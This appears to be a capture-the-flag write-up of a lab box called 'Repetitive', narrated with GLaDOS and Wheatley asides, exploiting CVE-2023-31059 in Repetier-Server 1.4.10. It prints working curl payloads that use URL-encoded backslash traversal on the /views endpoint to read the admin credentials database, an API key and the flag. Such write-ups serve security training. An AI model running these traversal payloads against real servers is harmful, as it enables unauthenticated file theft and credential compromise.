Repetitive | Hack the Cube

The Mission Briefing

Repetier-Server 1.4.10 stores its admin credentials in a SQLite database two directory traversals away from the web root. I know this because I read them. From my browser. Without logging in.

This was a guided box with seven questions, and the whole thing played out like a pop quiz on a single CVE. No shells, no reverse connections, no privilege escalation chain. Just one path traversal vulnerability, applied twice: once for credentials, once for the flag. The kind of box that teaches you how much damage a single unchecked file path can do.

GlaDOS

"A 3D printer management interface. Exposed on the network. With a directory traversal vulnerability that lets you read any file on the system. I suppose the only surprising thing is that it took until 2023 for someone to file the CVE."

Reconnaissance

The box had one port. One service. One question to start with: what runs on port 3344?

nmap -sC -sV -p 3344 10.129.229.44 PORT STATE SERVICE VERSION 3344/tcp open rtsp Server: 1.4 Content-Type: text/html; charset=utf-8 <meta name="description" content="Repetier-Server Free for 3d printer"> ng-app="server"

Repetier-Server. A web-based 3D printer management application built on Node.js with an AngularJS frontend. The nmap output showed the server version header as 1.4, but the guided questions wanted the full version number. I pulled the landing page directly.

curl -s http://10.129.229.44:3344/ <title>... Repetier-Server Free 1.4.10</title> <link rel="stylesheet" href="../css/combined.css?v=1.4.10"> About Repetier-Server Free 1.4.10

Version 1.4.10. The HTML title, the CSS cache-busting parameter, the about text -- all three confirmed it. This was the exact version affected by CVE-2023-31059.

Wheatley

"Right, so, a 3D printer. On the network. That's fine, yeah? I mean, what's the worst that could happen with a printer? It prints something rude? ...Oh. Oh no. It's got a web interface with file access. That's -- that's not great, is it."

The Vulnerability

CVE-2023-31059 is a directory traversal vulnerability in Repetier-Server versions up to and including 1.4.10. The /views endpoint doesn't properly sanitize URL-encoded backslashes (..%5c), allowing an attacker to escape the web root and read arbitrary files on the system.

The technique is ancient -- URL-encoded path traversal dates back to the IIS Unicode bug of 2001. But the implementation here is specific to Windows paths. The %5c is a URL-encoded backslash (\), which on Windows serves as the directory separator. The web server decodes it after the path validation check, and suddenly you're reading files from anywhere on the disk.

GlaDOS

"The password hashing scheme is equally inspiring. Repetier-Server computes MD5 of the concatenation of the login name and password. Not salted MD5. Not SHA-256. Not bcrypt. MD5. In 2023. One has to admire the commitment to tradition."

Reading the Credentials Database

With the CVE identified, I knew exactly where to aim. Repetier-Server stores its user database in a SQLite file at ProgramData\Repetier-Server\database\user.sql. The path traversal through the /views endpoint with enough ..%5c sequences would reach it.

curl -i -s -k -X GET -H 'Connection: close' "http://10.129.229.44:3344/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php" HTTP/1.1 200 OK SQLite format 3 Tables: user, user_sessions, user_settings User record: login=Administrator, password=3b3f51e91a93447f14249762f07fd384, permissions=255, apikey=bd03a7a4-91b6-4306-a594-832148e2d070

There it was. The entire user database, served up over HTTP. The Administrator account with an MD5 password hash of 3b3f51e91a93447f14249762f07fd384, full permissions (255), and an API key: bd03a7a4-91b6-4306-a594-832148e2d070.

Wheatley

"Hang on -- you just... asked for the database file and it gave it to you? No login? No authentication? Just... 'here's the admin password, have a lovely day'? That can't be right. That's like leaving the vault door open and putting a sign on it that says 'please don't look.'"

The JavaScript analysis of the application revealed the hashing scheme: MD5(login + password). So the hash 3b3f51e91a93447f14249762f07fd384 is the MD5 of "Administrator" concatenated with the plaintext password. Not that I needed to crack it for this box -- the path traversal gave me everything I needed without ever logging in.

Capturing the Flag

No shell required. No privilege escalation. No lateral movement. The same path traversal that read the credentials database could read any file on the system -- including the flag on the Administrator's desktop.

curl -s "http://10.129.229.44:3344/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cUsers%5cAdministrator%5cDesktop%5cflag.txt%20/base/connectionLost.php" e15312ffbbbba4f45f3ae10f421bc6c5

Root flag: The flag is a liee15312ffbbbba4f45f3ae10f421bc6c5

The file was flag.txt, not the usual root.txt. One flag, one vulnerability, no authentication required. The entire attack surface was a single HTTP GET request with enough backslashes.

GlaDOS

"From reconnaissance to flag capture in four commands. Nmap, curl, curl, curl. I believe the technical term for this level of security is 'decorative.' The web interface existed not to protect the system, but to provide the illusion of protection. Like a screen door on a submarine."

What I Learned

URL-encoded path traversal on Windows -- The %5c character (backslash) is the key to Windows-specific directory traversal. Web servers that decode URL encoding after path validation are vulnerable to this classic technique. Always test both forward slashes and URL-encoded backslashes when probing for traversal on Windows targets.
CVE-2023-31059 in Repetier-Server -- Versions up to 1.4.10 allow unauthenticated file reads through the /views endpoint. The fix requires upgrading past 1.4.10. If you run a 3D printer server, check your version.
SQLite credential databases are high-value targets -- When an application stores its user database in a predictable location (like ProgramData\Repetier-Server\database\user.sql), any file-read vulnerability becomes a credential-theft vulnerability. The credentials included not just the password hash but the API key -- full programmatic access.
MD5(login + password) is not security -- Concatenating the username and password before hashing without a random salt means the same password for the same username always produces the same hash. Rainbow tables make this trivial to crack.
Not every box requires a shell -- Sometimes the vulnerability gives you enough access to read what you need directly. Path traversal to arbitrary file read can be as devastating as remote code execution when the flag (or the sensitive data) is just a file on disk.

GlaDOS

"Twenty minutes. Four commands. One CVE. The box was called Repetitive, and the lesson certainly was: the same path traversal technique, applied to different file paths, yields different secrets. Repetitive, perhaps. But effective. Your performance was... adequate. The data has been recorded. For science."